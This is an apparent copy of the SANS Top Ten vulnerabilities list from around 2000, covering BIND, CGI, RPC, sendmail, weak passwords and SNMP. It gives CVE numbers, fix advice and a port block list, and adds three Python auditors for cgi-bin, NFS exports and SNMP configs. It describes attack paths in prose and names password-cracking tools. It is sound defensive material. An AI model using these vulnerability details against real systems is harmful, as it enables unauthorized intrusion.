      Note 1. This is a living document. It includes initial, step-by-step instructions
              and pointers for correcting the flaws. We will update these instructions as
              more current or convenient methods are identified and we welcome your input.
              This is a community consensus document -- your experience in eliminating the 
              vulnerabilities can help others who come after you. To make suggestions 
              e-mail info@sans.org with the subject "Top Ten Comments". To get the latest
              version of the guidelines, e-mail info@sans.org with the subject "Top Ten Fixes".
      
      Note 2. You'll find references to CVE numbers -- the Common Vulnerabilities and 
              Exposures reference numbers that correspond with vulnerabilities. CAN numbers
              are candidates for CVE entries that are not yet fully verified. For more data
              on the award-winning CVE project, see http://cve.mitre.org. 
      
      Note 3. At the end of the list, you'll find an extra section offering a list of the
              ports used by commonly probed and attacked services. By blocking traffic to
              those ports at the firewall or other network perimeter protection device, you
              add an extra layer of defense that helps protect you from configuration mistakes. 
       
      1. BIND weaknesses: nxt, qinv and in.named allow immediate root compromise. 
         The Berkeley Internet Name Domain (BIND) package is the most widely used implementation
         of Domain Name Service (DNS) -- the critical means by which we all locate systems on the
         Internet by name (e.g., www.sans.org) without having to know specific IP addresses -- and
         this makes it a favorite target for attack. Sadly, according to a mid-1999 survey, about 
         50% of all DNS servers connected to the Internet are running vulnerable versions of BIND.
         In a typical example of a BIND attack, intruders erased the system logs, and installed 
         tools to gain administrative access. They then compiled and installed IRC utilities and
         network scanning tools, which they used to scan more than a dozen class-B networks in search
         of additional systems running vulnerable versions of BIND. In a matter of minutes, they had 
         used the compromised system to attack hundreds of remote systems abroad, resulting in many 
         additional successful compromises. This illustrates the chaos that can result from a single
         vulnerability in the software for ubiquitous Internet services such as DNS.  
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      As of May 22, 2000, any version earlier than BIND v.8.2.2 patch level 5 is vulnerable.
      
      CVE Entries: 
      nxt CVE-1999-0833
      qinv CVE-1999-0009
      Other related entries: CVE-1999-0835, CVE-1999-0848, CVE-1999-0849, CVE-1999-0851
      
      Advice on correcting the problem:
      A. Disable the BIND name daemon (named) on all systems that are not authorized to be DNS servers.
         Some experts recommend you also remove the DNS software.
      
      B. On machines that are authorized DNS servers, update to the latest version and patch level 
         (as of May 22, 2000, latest version was 8.2.2 patch level 5) Use the guidance contained in the
         following advisories:
      
      For the NXT vulnerability: http://www.cert.org/advisories/CA-99-14-bind.html
      For the QINV (Inverse Query) and NAMED vulnerabilities: 
      http://www.cert.org/advisories/CA-98.05.bind_problems.html
      http://www.cert.org/summaries/CS-98.04.html
      
      C. Run BIND as a non-privileged user for protection in the event of future remote-compromise 
         attacks. (However, only processes running as root can be configured to use ports below 1024 --
         a requirement for DNS. Therefore you must configure BIND to change the user-id after binding
         to the port.)
      
      D. Run BIND in a chroot()ed directory structure for protection in the event of future remote-
         compromise attacks.
       
      2. Vulnerable CGI programs and application extensions (e.g., ColdFusion) installed on web servers. 
         Most web servers support Common Gateway Interface (CGI) programs to provide interactivity in web 
         pages, such as data collection and verification. Many web servers come with sample CGI programs 
         installed by default. Unfortunately, many CGI programmers fail to consider ways in which their
         programs may be misused or subverted to execute malicious commands. Vulnerable CGI programs present
         a particularly attractive target to intruders because they are relatively easy to locate, and they 
         operate with the privileges and power of the web server software itself. Intruders are known to 
         have exploited vulnerable CGI programs to vandalize web pages, steal credit card information, and
         set up back doors to enable future intrusions, even if the CGI programs are secured. When Janet 
         Reno's picture was replaced by that of Adolph Hitler at the Department of Justice web site, an 
         in-depth assessment concluded that a CGI hole was the most probable avenue of compromise. Allaire's
         ColdFusion is a web server application package which includes vulnerable sample programs when 
         installed. As a general rule, sample programs should always be removed from production systems.  
      
      Systems Affected: 
      
      All web servers. 
      
      CVE Entries: 
      ** Sample CGI programs (All CGI)
      Remedy: 
      Remove all sample CGI programs on a production server.
      
      ** CAN-1999-0736(IIS 4.0, Microsoft Site Server 3.0, which is included with Microsoft Site Server
         3.0 Commerce Edition, Microsoft Commercial Internet System 2.0, and Microsoft BackOffice Server
         4.0 and 4.5)
      
      (see http://www.microsoft.com/technet/security/bulletin/ms99-013.asp )
      
      Remedy:
      
      Apply patch at : ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/   
      
      CVE-1999-0067 (phf phone book program included with older NCSA and Apache server)
      CVE-1999-0068 ('mylog.html' sample script shipped with the PHP/FI)
      CVE-1999-0270 (IRIX 6.2, IRIX 6.3, IRIX 6.4)
      CVE-1999-0346 (sample script shipped with the PHP/FI package)
      CVE-2000-0207 (IRIX 6.5)
      
      Most important CGI Vulnerabilities not including sample programs
      CAN-1999-0467 (WebCom Guestbook CGI)
      
      ** CAN-1999-0509 (All CGI Web Servers)
      Refer to http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html 
      
      Remedy:
      The solution to this problem is to ensure that the CGI bin directory does not include any 
      general-purpose interpreters, for example 
      
      PERL 
      Tcl 
      UNIX shells (sh, csh, ksh, etc.) 

      CVE-1999-0021 (Muhammad A. Muquit's wwwcount version 2.3)
      CVE-1999-0039 (Outbox Environment Subsystem for IRIX)
      CVE-1999-0058 (PHP/FI package written by Rasmus Lerdorf)
      CVE-1999-0147 (Glimpse HTTP 2.0 and WebGlimpse)
      CVE-1999-0148 (Outbox Environment Subsystem for IRIX)
      CVE-1999-0149 (Outbox Environment Subsystem for IRIX)
      
      ** CVE-1999-0174 (All CGI Web Servers) Refer to, 
      http://xforce.iss.net/static/291.php 
      (More info at http://www.netspace.org/cgi-bin/wa?A2=ind9702B&L=bugtraq&P=R64 )
      Remedy:
      Remove the "view-source" script from the cgi-bin directory on your web server.
      
      CVE-1999-0177 (O'Reilly Website 2.0 and earlier CGI)
      CVE-1999-0178 (O'Reilly Website 2.0 and earlier CGI)
      CVE-1999-0237 (Webcom's CGI Guestbook for Win32 web servers)
      CVE-1999-0262 (fax survey CGI script on Linux )
      CVE-1999-0279 (Excite for Web Servers)
      CVE-1999-0771 (Compaq Management Agents and the Compaq Survey Utility)
      CVE-1999-0951 (OmniHTTPd CGI program)
      CVE-2000-0012 (MS SQL CGI program)
      CVE-2000-0039 (AltaVista search engine)
      CVE-2000-0208 (htsearch CGI script for ht://dig)
      
      ColdFusion Sample Program Vulnerabilities
      ** CAN-1999-0455
      ** CAN-1999-0922
      ** CAN-1999-0923
      
      ColdFusion Other Vulnerability
      ** CAN-1999-0760
      ** CVE-2000-0057
      
      Advice on correcting the problem:
      A. Do not run web servers as root 
      
      B. Get rid of CGI script interpreters in bin directories: 
      
      http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html
      
      C. Remove unsafe CGI scripts 
      
      http://www.cert.org/advisories/CA-97.07.nph-test-cgi_script.html
      http://www.cert.org/advisories/CA-96.06.cgi_example_code.html
      http://www.cert.org/advisories/CA-97.12.webdist.html
      
      D. Write safer CGI programs:
      
      http://www-4.ibm.com/software/developer/library/secure-cgi/
      http://www.cert.org/tech_tips/cgi_metacharacters.html
      http://www.cert.org/advisories/CA-97.24.Count_cgi.html
      
      E. Don't configure CGI support on Web servers that don't need it.
      
      F. Run your Web server in a chroot()ed environment to protect the machine against yet
         to be discovered exploits 
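
      An added example, not part of the SANS document: an audit of a cgi-bin
      tree for the two things items B and C say to remove, general-purpose
      interpreters and sample scripts. It also catches an interpreter that
      was renamed, copied or symlinked into the directory. The extra shell
      names, the demo tree and the stand-in "interpreter" file are
      constructed assumptions.

```python
import filecmp
import os
import re
import shutil

# Interpreters the list names (PERL, Tcl, sh, csh, ksh); bash, tcsh, zsh and
# wish are this example's reading of "etc.".
INTERPRETERS = {"perl", "tclsh", "wish", "sh", "csh", "ksh", "bash", "tcsh", "zsh"}
# Sample scripts named in the list or in the advisory titles it links to.
SAMPLE_SCRIPTS = {"phf", "view-source", "nph-test-cgi"}


def _base(name):
    """Normalise a file name: perl5.005.exe -> perl, TCLSH8.0 -> tclsh."""
    name = name.lower()
    if name.endswith(".exe"):
        name = name[:-4]
    return re.sub(r"[\d.]+$", "", name)


def system_interpreters():
    """Paths of the interpreters installed on this host, found via PATH."""
    found = (shutil.which(name) for name in sorted(INTERPRETERS))
    return [path for path in found if path]


def audit_cgi_bin(cgi_dir, interpreter_paths=None):
    """Return sorted [(relative_path, reason)] for files that should be removed."""
    if interpreter_paths is None:
        interpreter_paths = system_interpreters()
    findings = []
    for root, _dirs, files in os.walk(cgi_dir):
        for name in files:
            path = os.path.join(root, name)
            if not os.path.isfile(path):          # broken symlink, socket, ...
                continue
            reason = None
            for interp in interpreter_paths:
                try:
                    if os.path.samefile(path, interp):
                        reason = "link to " + interp
                    elif filecmp.cmp(path, interp, shallow=False):
                        reason = "copy of " + interp
                except OSError:                    # unreadable file: skip compare
                    continue
                if reason:
                    break
            if reason is None and _base(name) in INTERPRETERS:
                reason = "named like an interpreter"
            if reason is None and name.lower() in SAMPLE_SCRIPTS:
                reason = "sample script"
            if reason:
                findings.append((os.path.relpath(path, cgi_dir), reason))
    return sorted(findings)


def make_demo_tree(top):
    """Build a constructed cgi-bin and a stand-in interpreter; return both paths."""
    interp = os.path.join(top, "fakebin", "perl")
    cgi = os.path.join(top, "cgi-bin")
    os.makedirs(os.path.dirname(interp))
    os.makedirs(os.path.join(cgi, "old"))
    with open(interp, "wb") as fh:
        fh.write(b"constructed stand-in for an interpreter binary\n")
    shutil.copyfile(interp, os.path.join(cgi, "helper"))    # renamed copy
    os.symlink(interp, os.path.join(cgi, "run"))            # symlink
    for rel, body in (("phf", b"sample\n"),
                      ("guestbook.cgi", b"#!/usr/bin/perl\n"),
                      (os.path.join("old", "tclsh8.0"), b"stale\n")):
        with open(os.path.join(cgi, rel), "wb") as fh:
            fh.write(body)
    return cgi, interp


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as top:
        demo_cgi, demo_interp = make_demo_tree(top)
        for rel, why in audit_cgi_bin(demo_cgi, [demo_interp]):
            print(f"{rel}: {why}")
```

      Called with only a directory, audit_cgi_bin() compares against the
      interpreters found on the host's PATH.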
       
      3. Remote Procedure Call (RPC) weaknesses in rpc.ttdbserverd (ToolTalk), rpc.cmsd 
         (Calendar Manager), and rpc.statd that allow immediate root compromise 
         
      Remote procedure calls (RPC) allow programs on one computer to execute programs on
      a second computer. They are widely-used to access network services such as shared 
      files in NFS. Multiple vulnerabilities caused by flaws in RPC, are being actively 
      exploited. There is compelling evidence that the vast majority of the distributed 
      denial of service attacks launched during 1999 and early 2000 were executed by 
      systems that had been victimized because they had the RPC vulnerabilities. The 
      broadly successful attack on U.S. military systems during the Solar Sunrise incident
      also exploited an RPC flaw found on hundreds of Department of Defense systems. 
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      
      CVE Entries: 
      rpc.ttdbserverd - CVE-1999-0687, CVE-1999-0003, CVE-1999-0693 
      (-0687 is newer than -0003, but both allow root from remote attackers and it's
      likely that -0003 is still around a LOT; -0693 is only locally exploitable, but
      does give root)
      
      rpc.cmsd - CVE-1999-0696
      rpc.statd - CVE-1999-0018, CVE-1999-0019.
      
      Advice on correcting the problem:
      
      A. Wherever possible, turn off and/or remove these services on machines directly 
         accessible from the Internet.
      
      B. Where you must run them, install the latest patches:
      
      For Solaris Software Patches: 
      http://sunsolve.sun.com
      
      For IBM AIX Software 
      http://techsupport.services.ibm.com/support/rs6000.support/downloads
      http://techsupport.services.ibm.com/rs6k/fixes.html
      
      For SGI Software Patches:
      http://support.sgi.com/ 
      
      For Compaq (Digital Unix) Patches:
      http://www.compaq.com/support
      
      Search the vendor patch database for tooltalk patches and install them right away.
      
      A summary document pointing to specific guidance about each of three principal RPC
      vulnerabilities may be found at: http://www.cert.org/incident_notes/IN-99-04.html
      
      For statd: http://www.cert.org/advisories/CA-99-05-statd-automountd.html 
      For ToolTalk: http://www.cert.org/advisories/CA-98.11.tooltalk.html
      For Calendar Manager: http://www.cert.org/advisories/CA-99-08-cmsd.html 
       
      4. RDS security hole in the Microsoft Internet Information Server (IIS) 
      Microsoft's Internet Information Server (IIS) is the web server software found on
      most web sites deployed on Microsoft Windows NT and Windows 2000 servers. Programming
      flaws in IIS's Remote Data Services (RDS) are being employed by malicious users to
      run remote commands with administrator privileges. Some participants who developed
      the "Top Ten" list believe that exploits of other IIS flaws, such as .HTR files, are
      at least as common as exploits of RDS. Prudence dictates that organizations using IIS
      install patches or upgrades to correct all known IIS security flaws when they install
      patches or upgrades to fix the RDS flaw.  
      
      Systems Affected: 
      
      Microsoft Windows NT systems using Internet Information Server

      CVE Entries: 
      CVE-1999-1011
      
      Advice on correcting the problem:
      A. An outstanding guide to the RDS weakness and how to correct it may be found 
      at: http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2 
      
      B. Microsoft has also posted relevant information at:
      
      http://support.microsoft.com/support/kb/articles/q184/3/75.asp
      http://www.microsoft.com/technet/security/bulletin/ms98-004.asp
      http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
       
      5. Sendmail buffer overflow weaknesses, pipe attacks and MIMEbo, that allow immediate
         root compromise. 
         
      Sendmail is the program that sends, receives, and forwards most electronic mail processed
      on UNIX and Linux computers. Sendmail's widespread use on the Internet makes it a prime 
      target of attackers. Several flaws have been found over the years. The very first advisory
      issued by CERT/CC in 1988 made reference to an exploitable weakness in sendmail. In one of
      the most common exploits, the attacker sends a crafted mail message to the machine running
      Sendmail, and Sendmail reads the message as instructions requiring the victim machine to 
      send its password file to the attacker's machine (or to another victim) where the passwords
      can be cracked. 
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      
      CVE Entries: 
      CVE-1999-0047, CVE-1999-0130, CVE-1999-0131, CVE-1999-0203, CVE-1999-0204, CVE-1999-0206. 
      CVE-1999-0130 is locally exploitable only.
      
      Advice on correcting the problem:
      A. Upgrade to latest version of Sendmail and/or implement patches for sendmail. See
      http://www.cert.org/advisories/CA-97.05.sendmail.html 
      
      B. Do not run Sendmail in daemon mode (turn off the -bd switch) on machines that are neither
         mail servers nor mail relays.
       
      6. sadmind and mountd 
      
      Sadmind allows remote administration access to Solaris systems, providing graphical access to
      system administration functions. Mountd controls and arbitrates access to NFS mounts on UNIX 
      hosts. Buffer overflows in these applications can be exploited allowing attackers to gain 
      control with root access. 
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      
      Sadmind: Solaris machines only
      
      CVE Entries: 
      
      sadmind - CVE-1999-0977
      mountd - CVE-1999-0002.
      
      Advice on correcting the problem:
      A. Wherever possible, turn off and/or remove these services on machines directly accessible 
         from the Internet.
      
      B. Install the latest patches:
      
      For Solaris Software Patches:
      http://sunsolve.sun.com
      
      For IBM AIX Software
      http://techsupport.services.ibm.com/support/rs6000.support/downloads
      http://techsupport.services.ibm.com/rs6k/fixes.html
      
      For SGI Software Patches:
      http://support.sgi.com/ 
      
      For Compaq (Digital Unix) Patches:
      http://www.compaq.com/support
      
      C. More guidance at:
      
      http://www.cert.org/advisories/CA-99-16-sadmind.html
      http://www.cert.org/advisories/CA-98.12.mountd.html 
       
      7. Global file sharing and inappropriate information sharing via NetBIOS and 
      Windows NT ports 135->139 (445 in Windows2000), or UNIX NFS exports on port 
      2049, or Macintosh Web sharing or AppleShare/IP on ports 80, 427, and 548.  
      These services allow file sharing over networks. When improperly configured, they can 
      expose critical system files or give full file system access to any hostile party 
      connected to the network. Many computer owners and administrators use these services 
      to make their file systems readable and writeable in an effort to improve the convenience
      of data access. Administrators of a government computer site used for software development
      for mission planning made their files world readable so people at a different government 
      facility could get easy access. Within two days, other people had discovered the open 
      file shares and stolen the mission planning software.
      
      When file sharing is enabled on Windows machines they become vulnerable to both information
      theft and certain types of quick-moving viruses. A recently released virus called the 911 
      Worm uses file shares on Windows 95 and 98 systems to propagate and causes the victim's 
      computer to dial 911 on its modem. Macintosh computers are also vulnerable to file sharing
      exploits.
      
      The same NetBIOS mechanisms that permit Windows File Sharing may also be used to enumerate
      sensitive system information from NT systems. User and Group information (usernames, last 
      logon dates, password policy, RAS information), system information, and certain Registry 
      keys may be accessed via a "null session" connection to the NetBIOS Session Service. This
      information is typically used to mount a password guessing or brute force password attack
      against the NT target.
       
      Systems Affected: 
      
      UNIX, Windows, and Macintosh systems.

      CVE Entries: 
      SMB shares with poor access control - CAN-1999-0520
      NFS exports to the world - CAN-1999-0554
      These candidate entries are likely to change significantly before being accepted as full 
      CVE entries.
      
      Advice on correcting the problem:
      A. When sharing mounted drives, ensure only required directories are shared.
      
      B. For added security, allow sharing only to specific IP addresses because DNS names can 
         be spoofed. 
      
      C. For Windows systems, ensure all shares are protected with strong passwords.
      
      D. For Windows NT systems, prevent anonymous enumeration of users, groups, system 
         configuration and registry keys via the "null session" connection. 
      
      Block inbound connections to the NetBIOS Session Service (tcp 139) at the router or 
      the NT host.
      
      Consider implementing the RestrictAnonymous registry key for Internet-connected hosts in
      standalone or non-trusted domain environments:
      
      NT4: http://support.microsoft.com/support/kb/articles/Q143/4/74.asp
      Win2000: http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
      
      E. A quick, free, and secure test for the presence of NetBIOS file sharing, and its related
      vulnerabilities, effective for machines running ANY operating system, is available at the 
      Gibson Research Corporation web site. Simply visit http://grc.com/ and click the "ShieldsUP"
      icon to receive a real-time appraisal of any system's NetBIOS exposure. Detailed instructions
      are available to help Microsoft Windows users deal with NetBIOS vulnerabilities.
      
      F. For Macintosh systems, disable file sharing and web sharing extensions unless absolutely 
      required. If file sharing must be enabled, ensure strong passwords for access, and stop file
      sharing during periods in which it is not required.
      
      To permanently disable Web sharing in MacOS 8 or MacOS 9, remove two files and restart:
      System Folder:Control Panels:Web Sharing
      System Folder:Extensions:Web Sharing Extension
      
      To permanently disable AppleShare/IP in MacOS 9, remove one file and restart:
      System Folder:Extensions:Shareway IP Personal Bgnd
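
      Advice A and B above, applied to NFS, as an added example that is not part of the
      SANS text: an auditor for exports lines that flags exports to the world, clients
      granted by DNS name rather than IP address, and exported system directories. The
      sample file is constructed; the Linux exports(5) syntax and the SYSTEM_DIRS list
      are assumptions.

```python
import ipaddress
import re

# Constructed sample in Linux exports(5) syntax; not taken from any real host.
SAMPLE_EXPORTS = """\
# path       client(options) ...
/home        192.0.2.10(rw) 192.0.2.0/24(ro)
/            *(rw)
/pub         (ro)
/projects    build.example.com(rw)
/etc         192.0.2.11(rw)
/srv/cad     192.0.2.20 (rw)
"""

# Assumption: directories this example treats as critical system files.
SYSTEM_DIRS = ("/etc", "/usr", "/bin", "/sbin", "/boot")

# One client field: an optional host part followed by optional "(options)".
CLIENT_RE = re.compile(r"^(?P<host>[^()\s]*)(?:\((?P<opts>[^)]*)\))?$")


def is_ip_spec(host):
    """True if the client is an IP address or network, not a name."""
    try:
        ipaddress.ip_network(host, strict=False)
        return True
    except ValueError:
        return False


def is_system_path(path):
    """True for / itself and for anything at or below a SYSTEM_DIRS entry."""
    path = path.rstrip("/") or "/"
    return path == "/" or any(
        path == d or path.startswith(d + "/") for d in SYSTEM_DIRS)


def audit_exports(text):
    """Return a list of (path, client, issue) tuples for risky exports."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        # A path with no client list is treated as open to any host
        # (assumption: the conservative reading).
        path, clients = fields[0], fields[1:] or [""]
        for client in clients:
            match = CLIENT_RE.match(client)
            if match is None:
                findings.append((path, client, "could not parse client"))
                continue
            host = match.group("host")
            opts = {o.strip() for o in (match.group("opts") or "").split(",")}
            shown = host or "(any host)"
            if host in ("", "*"):
                # "(rw)" standing alone, e.g. after a stray space between
                # host and options, applies to every host.
                findings.append((path, shown, "exported to the world"))
            elif not is_ip_spec(host):
                findings.append((path, shown, "client named by DNS, not IP"))
            if is_system_path(path):
                mode = "read-write" if "rw" in opts else "read-only"
                findings.append(
                    (path, shown, "system directory exported " + mode))
    return findings


if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:10} {client:20} {issue}")
```

      The /srv/cad line shows the stray-space case: the address gets default options
      and the detached "(rw)" opens the directory to every host.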
       
      8. User IDs, especially root/administrator with no passwords or weak passwords. 
      Some systems come with "demo" or "guest" accounts with no passwords or with widely-known
      default passwords. Service workers often leave maintenance accounts with no passwords, 
      and some database management systems install administration accounts with default passwords.
      In addition, busy system administrators often select system passwords that are easily 
      guessable ("love," "money," "wizard" are common) or just use a blank password. Default 
      passwords provide effortless access for attackers. Many attackers try default passwords
      and then try to guess passwords before resorting to more sophisticated methods. Compromised
      user accounts get the attackers inside the firewall and inside the target machine. Once inside,
      most attackers can use widely-accessible exploits to gain root or administrator access. 
      
      Systems Affected: 
      
      All systems.
      
      CVE Entries: 
      Unix guessable (weak) password - CAN-1999-0501
      Unix default or blank password - CAN-1999-0502
      NT guessable (weak) password - CAN-1999-0503
      NT default or blank password - CAN-1999-0504
      
      These candidate entries are likely to change significantly before being accepted as full 
      CVE entries.
      
      Advice on correcting the problem:
      A. Create an acceptable password policy including assigned responsibility and frequency for
         verifying password quality. Ensure senior executives are not exempted. Also include in 
         the policy a requirement to change all default passwords before attaching computers to 
         the Internet, with substantial penalties for non-compliance.
      
      B1. VERY IMPORTANT! Obtain written authority to test passwords
      
      B2. Test passwords with password cracking programs:
      
      For Windows NT: L0phtCrack http://www.l0pht.com
      For UNIX: Crack http://www.users.dircon.co.uk/~crypto
      
      C. Implement utilities that check passwords when created.
      
      For UNIX: Npasswd, http://www.utexas.edu/cc/unix/software/npasswd
      For Windows NT: http://support.microsoft.com/support/kb/articles/Q161/9/90.asp
      
      D. Force passwords to expire periodically (at a frequency established in your security policy).
      
      E. Maintain password histories so users cannot recycle old passwords.
      
      Additional information may be found at:
      
      http://www.cert.org/tech_tips/passwd_file_protection.html
      http://www.cert.org/incident_notes/IN-98.03.html
      http://www.cert.org/incident_notes/IN-98.01.irix.html 
       
      9. IMAP and POP buffer overflow vulnerabilities or incorrect configuration. 
      IMAP and POP are popular remote access mail protocols, allowing users to access their
      e-mail accounts from internal and external networks. The "open access" nature of these
      services makes them especially vulnerable to exploitation because openings are frequently 
      left in firewalls to allow for external e-mail access. Attackers who exploit flaws in IMAP
      or POP often gain instant root-level control. 
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      
      CVE Entries: 
      CVE-1999-0005, CVE-1999-0006, CVE-1999-0042, CVE-1999-0920, CVE-2000-0091
      
      Advice on correcting the problem:
      A. Disable these services on machines that are not e-mail servers.
      
      B. Use the latest patches and versions. Additional information may be found at:
      
      http://www.cert.org/advisories/CA-98.09.imapd.html
      http://www.cert.org/advisories/CA-98.08.qpopper_vul.html
      http://www.cert.org/advisories/CA-97.09.imap_pop.html
      
      C. Some of the experts also recommend controlling access to these services using TCP wrappers
         and encrypted channels such as SSH and SSL to protect passwords.
       
      10. Default SNMP community strings set to public and private. 
          The Simple Network Management Protocol (SNMP) is widely used by network administrators to monitor
          and administer all types of network-connected devices ranging from routers to printers to computers.
          SNMP uses an unencrypted "community string" as its only authentication mechanism. Lack of encryption
          is bad enough, but the default community string used by the vast majority of SNMP devices is "public",
          with a few "clever" network equipment vendors changing the string to "private". Attackers can use this
          vulnerability in SNMP to reconfigure or shut down devices remotely. Sniffed SNMP traffic can reveal a 
          great deal about the structure of your network, as well as the systems and devices attached to it. 
          Intruders use such information to pick targets and plan attacks. 
          
      Systems Affected: 
      
      All system and network devices.
      
      CVE Entries: 
      default or blank SNMP community name (public) - CAN-1999-0517
      guessable SNMP community name - CAN-1999-0516
      hidden SNMP community strings - CAN-1999-0254, CAN-1999-0186
      
      These candidate entries are likely to change significantly before being accepted as full CVE entries.
      
      Advice on correcting the problem:
      A. If you do not absolutely require SNMP, disable it.
      
      B. If you are using SNMP, use the same policy for community names as used for passwords described 
         in Vulnerability Cluster Number 8 above.
      
      C. Validate and check community names using snmpwalk.
      
      D. Where possible make MIBs read only. Additional information:
      
      http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm#xtocid210315 
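
      Advice B and D above as a configuration audit, complementing the snmpwalk check
      in C (an added example, not part of the SANS text): it reads community lines in
      Net-SNMP snmpd.conf and Cisco IOS form and flags default names, guessable names
      and read-write access. The configuration lines are constructed; MIN_LENGTH and
      the pairing of findings with the candidate numbers listed above are assumptions.

```python
# Constructed configuration lines; not from any real device.
SAMPLE_CONFIG = """\
# Net-SNMP (UCD-SNMP) snmpd.conf style
rocommunity public
rwcommunity private 192.0.2.5
rocommunity k7Qz-mon1tor-93x 192.0.2.0/24
com2sec notConfigUser default wizard
! Cisco IOS style
snmp-server community public RO
snmp-server community Zr8-netops-41w RW 10
"""

DEFAULT_NAMES = {"public", "private"}
MIN_LENGTH = 8  # assumption: stand-in for the site's password policy


def parse_communities(text):
    """Return (line number, community, access) for each community line.

    access is "ro", "rw", or "unknown" when the line alone does not say.
    """
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        tok = raw.split()
        if not tok or tok[0][0] in "#!":
            continue  # blank line or comment
        keyword = tok[0].lower()
        if keyword in ("rocommunity", "rwcommunity") and len(tok) >= 2:
            records.append((lineno, tok[1], keyword[:2]))
        elif keyword == "com2sec" and len(tok) >= 4:
            # com2sec ends with the community name; access is set by
            # separate group/access lines, so it is unknown here.
            records.append((lineno, tok[-1], "unknown"))
        elif (keyword == "snmp-server" and len(tok) >= 3
              and tok[1].lower() == "community"):
            rest = [t.lower() for t in tok[3:]]
            # IOS grants read-only access unless RW is given.
            records.append((lineno, tok[2], "rw" if "rw" in rest else "ro"))
    return records


def is_guessable(name):
    """Rough policy check: too short, or letters only, or digits only."""
    return len(name) < MIN_LENGTH or name.isalpha() or name.isdigit()


def audit_snmp(text):
    """Return (line number, community, issue) tuples."""
    findings = []
    for lineno, name, access in parse_communities(text):
        if name.lower() in DEFAULT_NAMES:
            findings.append(
                (lineno, name, "default community (CAN-1999-0517)"))
        elif is_guessable(name):
            findings.append(
                (lineno, name, "guessable community (CAN-1999-0516)"))
        if access == "rw":
            findings.append((lineno, name, "read-write access"))
    return findings


if __name__ == "__main__":
    for lineno, name, issue in audit_snmp(SAMPLE_CONFIG):
        print(f"line {lineno}: {name}: {issue}")
```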
       
      A High Priority Bonus Item for Windows Users and Administrators: 
      Various Scripting Holes in Internet Explorer and Office2000 
      
      Recent virus attacks have illustrated how macro and script code could spread easily through
      e-mail attachments, and people were admonished to avoid opening potentially dangerous 
      attachments. However, Windows users can also spread malicious viruses without opening attachments.
      Microsoft Outlook and Outlook Express will execute HTML and script code in an e-mail in their 
      default installations. In addition, several so-called ActiveX components are incorrectly executable
      from an e-mail containing HTML and script code. Some of the vulnerable controls include the 
      Scriptlet.typelib (ships with IE 4.x and 5.x) and the UA control (Office 2000). Another 
      vulnerability arising from the use of Active Scripting is that an e-mail could be used to 
      install new software on a user's computer.
      
      A relatively benign virus known as the kak worm is already spreading through these mechanisms. 
      A malicious version of kak can be anticipated at any time. We recommend that all users and 
      administrators set Outlook and Outlook Express to read e-mail in the "Restricted Sites Zone" 
      and then further disable all Active Scripting and ActiveX related settings in that zone. This
      is done in the Options dialog's Security tab, but can be automated using System Policies. 
      Microsoft has made patches available for the individual problems and is readying a patch which
      will set the security settings in Outlook, but apparently has no plans on fixing Outlook Express.
       
      Systems Affected:
      
      All Windows systems with Internet Explorer 4.x and 5.x (even if it is not used) or Office 2000.
      Windows 2000 is not affected by some of the IE issues.
      
      CVE Entries:
      
      CVE-1999-0668
      CAN-2000-0329
      
      Advice on correcting the problem:
      http://www.microsoft.com/security/bulletins/ms99-032.asp
      http://www.microsoft.com/security/bulletins/MS99-048.asp
      http://www.microsoft.com/technet/security/bulletin/MS00-034.asp
      
      The fixes for the particular vulnerabilities discussed here are available from:
      
      http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm
      http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm
      http://officeupdate.microsoft.com/info/ocx.htm
      
      Set your Security Zone to restricted sites and then disable all active content in that zone. 
      
      Apply the patch to Outlook as soon as it becomes available at:
      
      http://www.officeupdate.com/2000/articles/out2ksecarticle.htm
      
      Updating your virus detection software, while important, is not a complete solution for this
      problem. You must also correct the flaws in Microsoft's software.
       
      Perimeter Protection For An Added Layer of Defense In Depth 
      
      In this section, we list ports that are commonly probed and attacked. Blocking these ports is
      a minimum requirement for perimeter security, not a comprehensive firewall specification list.
      A far better rule is to block all unused ports. And even if you believe these ports are blocked,
      you should still actively monitor them to detect intrusion attempts. A warning is also in order.
      Blocking some of the ports in the following list may disable needed services. Please consider 
      the potential effects of these recommendations before implementing them.
      
      Block "spoofed" addresses-- packets coming from outside your company sourced from internal
      addresses or private (RFC1918 and network 127) addresses. Also block source routed packets. 
      
      Login services-- telnet (23/tcp), SSH (22/tcp), FTP (21/tcp), NetBIOS (139/tcp), rlogin et 
      al (512/tcp through 514/tcp) 
      
      RPC and NFS-- Portmap/rpcbind (111/tcp and 111/udp), NFS (2049/tcp and 2049/udp), lockd 
      (4045/tcp and 4045/udp) 
      
      NetBIOS in Windows NT -- 135 (tcp and udp), 137 (udp), 138 (udp), 139 (tcp). Windows 2000 -- 
      the earlier ports plus 445 (tcp and udp) 
      
      X Windows -- 6000/tcp through 6255/tcp 
      
      Naming services-- DNS (53/udp) to all machines which are not DNS servers, DNS zone transfers 
      (53/tcp) except from external secondaries, LDAP (389/tcp and 389/udp) 
      
      Mail-- SMTP (25/tcp) to all machines, which are not external mail relays, 
      POP (109/tcp and 110/tcp), IMAP (143/tcp) 
      
      Web-- HTTP (80/tcp) and SSL (443/tcp) except to external Web servers, may also want to block
      common high-order HTTP port choices (8000/tcp, 8080/tcp, 8888/tcp, etc.) 
      
      "Small Services"-- ports below 20/tcp and 20/udp, time (37/tcp and 37/udp) 
      
      Miscellaneous-- TFTP (69/udp), finger (79/tcp), NNTP (119/tcp), NTP (123/tcp), LPD (515/tcp),
